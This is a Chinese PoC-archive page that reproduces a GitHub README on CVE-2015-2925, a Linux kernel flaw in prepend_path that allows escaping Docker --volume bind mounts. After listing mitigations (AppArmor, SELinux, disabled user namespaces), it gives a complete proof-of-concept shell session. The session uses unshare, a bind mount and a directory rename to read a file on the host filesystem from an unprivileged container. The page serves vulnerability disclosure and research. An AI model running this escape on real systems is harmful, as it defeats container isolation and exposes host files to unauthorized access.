目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2015-2925 PoC — Linux kernel 权限许可和访问控制问题漏洞

来源
https://github.com/Kagami/docker_cve-2015-2925
关联漏洞
标题:Linux kernel 权限许可和访问控制问题漏洞 (CVE-2015-2925)
Description:Linux kernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。NFSv4 implementation是其中的一个分布式文件系统协议。 Linux kernel 4.2.3及之前版本的fs/dcache.c文件中的‘prepend_path’函数存在安全漏洞,该漏洞源于程序没有正确处理绑定挂载中的重命名操作。本地攻击者可通过重命名目录利用该漏洞绕过既定的容器保护机制。
Description
Docker + CVE-2015-2925 = escaping from --volume
介绍
# Docker + CVE-2015-2925 = escaping from --volume

[Recent vulnerability in Linux](http://www.openwall.com/lists/oss-security/2015/04/03/7) known for about half of the year (several months publicly) made it possible to escape from bind mounts. In particular in case of Docker it's possible to escape from inside the directory mounted via `--volume` option to the appropriate host's filesystem.

Docker Security Team [is already aware](http://www.openwall.com/lists/oss-security/2015/05/07/10) of the issue and allowed to publish this in order to attract public attention.

Thanks to [Jann Horn](https://github.com/thejh) for poining this out, basically I just reproduced it.

## Mitigation

Any of this will be sufficient:

* AppArmor-enabled kernel and AppArmor Docker profile
* SELinux-enabled kernel and SELinux Docker policy
* Disabled user namespaces in kernel

## Notes

* This is not fixed in upstream and distros yet and should work on any recent kernel
* This doesn't require root inside the container
* Distros provide different versions of util-linux package which unshare(1) is part of and it might return "Operation not permitted" in your case; package from Debian Jessie was tested to work as expected

## Proof of concept

```
# uname -r
3.18.9-aufs
# zgrep USER_NS /proc/config.gz
CONFIG_USER_NS=y
# docker -v
Docker version 1.6.1, build 97cd073
# docker pull debian:jessie
# mkdir /test && chmod 777 /test
# echo escaped > /etc/hostdata && chmod 644 /etc/hostdata
# docker run -i -t --rm -v /test:/test -u nobody debian:jessie
nobody@fc8925af0f19:/$ unshare -m -U -r /bin/bash
root@fc8925af0f19:/# cd /test
root@fc8925af0f19:/test# mkdir A A/B C D
root@fc8925af0f19:/test# mount --bind A D
root@fc8925af0f19:/test# cd D/B
root@fc8925af0f19:/test/D/B# mv /test/A/B /test/C
root@fc8925af0f19:/test/D/B# cat ../../../etc/hostdata
escaped
```
文件快照

 [4.0K]  /data/pocs/310592b141814e3f7f8a21e5318bcea5acccfffa
└── [1.8K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。